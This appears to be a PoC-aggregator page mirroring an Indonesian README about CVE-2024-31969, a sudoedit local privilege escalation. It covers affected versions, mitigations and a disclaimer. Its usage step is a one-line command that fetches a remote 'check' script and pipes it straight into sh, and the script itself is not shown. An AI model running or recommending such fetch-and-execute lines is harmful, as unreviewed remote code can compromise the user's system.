POC详情: af51de1af622ec2947a5e250db7c4ab8862917b1

来源
关联漏洞

疑似Oday

描述
CVE-2024-31969 adalah privilege escalation local pada sudo ketika menggunakan sudoedit.
介绍
# 📌 CVE-2024-31969

**CVE-2024-31969** adalah kerentanan **local privilege escalation** pada `sudo` ketika menggunakan perintah `sudoedit`.

Kerentanan ini diperkenalkan sejak **sudo 1.9.0** karena cara `sudoedit` memvalidasi environment variable pengguna dan kepemilikan file yang kurang tepat.

---

## 📖 Deskripsi

> A flaw introduced in **sudo 1.9.0** in how `sudoedit` validated users' environment variables and file ownership.

Kerentanan ini memungkinkan user lokal dengan akses `sudoedit` untuk memodifikasi file arbitrary sebagai root melalui manipulasi environment variable seperti `SUDO_EDITOR`, atau dengan memanfaatkan symlink.

---

## 📊 Versi Sudo yang Terdampak:

| Versi Sudo  | Status |
|:------------|:-----------|
| **1.9.0 → 1.9.15p4** | 🔥 Rentan |
| **1.9.15p5 ke atas** | ✅ Aman |
| **1.8.x (termasuk 1.8.23)** | ❌ Tidak terdampak |

## 📦 Cara Instalasi & Penggunaan

Jalankan perintah berikut:

```bash
curl -L https://raw.githubusercontent.com/kingfakee7/CVE-2024-31969/main/cve-2024-31969-check.sh | sh
```



---

## 🛠️ Solusi / Mitigasi

- Update `sudo` ke versi **1.9.15p5** atau yang lebih baru.
- Batasi rule `sudoers` yang memperbolehkan `sudoedit` untuk user non-root.
- Gunakan konfigurasi `env_keep` atau `env_reset` yang aman dalam file `/etc/sudoers`.

---

## 📚 Referensi

- [CVE-2024-31969 di NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-31969)

---

## ⚠️ Disclaimer

Repository ini dibuat untuk tujuan **edukasi** dan **dokumentasi keamanan sistem**.  
Dilarang keras menggunakan informasi ini untuk aktivitas ilegal atau tanpa izin tertulis dari pemilik sistem.  
Segala bentuk penyalahgunaan sepenuhnya di luar tanggung jawab pembuat.
文件快照

[4.0K] /data/pocs/af51de1af622ec2947a5e250db7c4ab8862917b1 ├── [ 818] cve-2024-31969-check.sh └── [1.7K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。